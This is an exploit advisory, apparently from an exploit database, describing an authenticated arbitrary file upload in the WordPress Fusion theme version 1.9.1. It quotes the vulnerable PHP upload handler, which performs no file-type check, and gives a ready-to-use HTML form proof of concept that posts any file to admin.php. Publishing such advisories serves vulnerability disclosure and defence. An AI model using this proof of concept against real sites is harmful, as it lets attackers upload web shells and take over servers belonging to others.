Home / exploits WordPress Fusion 1.9.1 Arbitrary File Upload
Posted on 14 February 2015
------------------------------------------------------------------------------ WordPress Fusion Theme Authenicated Arbitrary File Upload ------------------------------------------------------------------------------ [-] Theme Link: https://wordpress.org/themes/fusion ( Over 334,000 Downloads ) http://digitalnature.ro/themes/fusion/ [-] Affected Version: Version 1.9.1 [-] Vulnerability Description: The vulnerable code is located in the /functions script: //SHORTENED CODE function fusion_options() { if ( 'fusion_save' == $_REQUEST['action'] ) { if ($_FILES["file-logo"]["type"]){ $directory = $uploadpath['basedir'].'/'; move_uploaded_file($_FILES["file-logo"]["tmp_name"], $directory . $_FILES["file-logo"]["name"]); update_option('fusion_logoimage', $uploadpath['baseurl']. "/". $_FILES["file-logo"]["name"]); } } add_action('admin_menu', 'fusion_options'); then function fusion_options can be called by LOGGED IN USERS and executed which leads to uploading any file on attacked server which may cause the site full take over. [-] Proof of Concept: <form action="http://localhost/x/wordpress/wp-admin/admin.php" method="post" enctype="multipart/form-data"> <input type="file" name="file-logo" /> <input type="hidden" name="action" value="fusion_save" /> <button type="submit" >Upload</button> </form>
